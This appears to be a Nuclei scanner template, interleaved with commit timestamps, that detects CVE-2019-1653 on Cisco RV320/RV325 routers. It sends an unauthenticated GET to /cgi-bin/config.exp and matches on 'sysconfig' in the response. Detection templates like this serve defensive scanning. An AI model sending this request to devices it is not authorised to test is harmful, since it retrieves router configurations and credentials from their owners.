2021-01-02 04:59:06 +00:00
id : CVE-2019-1653
2020-10-01 07:17:09 +00:00
info :
2022-06-14 15:04:48 +00:00
name : Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure
2020-10-01 07:17:09 +00:00
author : dwisiswant0
severity : high
2022-06-20 17:28:27 +00:00
description : |
Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.
2021-08-18 11:37:49 +00:00
reference :
2021-03-11 17:05:36 +00:00
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
- https://www.exploit-db.com/exploits/46262/
- https://www.exploit-db.com/exploits/46655/
2022-06-14 15:04:48 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-1653
2022-06-20 17:58:28 +00:00
remediation : |
Cisco has released firmware updates that address this vulnerability.
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-1653
cwe-id : CWE-200
2023-04-12 10:55:48 +00:00
epss-score : 0.97569
2022-08-27 04:41:18 +00:00
tags : kev,edb,cve,cve2019,cisco,router,exposure
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2020-10-01 07:17:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-10-01 07:17:09 +00:00
- method : GET
path :
- "{{BaseURL}}/cgi-bin/config.exp"
2022-06-20 17:28:27 +00:00
2020-10-01 07:17:09 +00:00
matchers-condition : and
matchers :
2022-06-20 17:28:27 +00:00
2020-10-01 07:17:09 +00:00
- type : word
2022-06-20 17:28:27 +00:00
part : body
2020-10-01 07:17:09 +00:00
words :
- "sysconfig"
2022-06-14 15:04:48 +00:00
2022-06-20 17:28:27 +00:00
- type : status
status :
- 200
2022-06-14 15:04:48 +00:00
# Enhanced by mp on 2022/06/14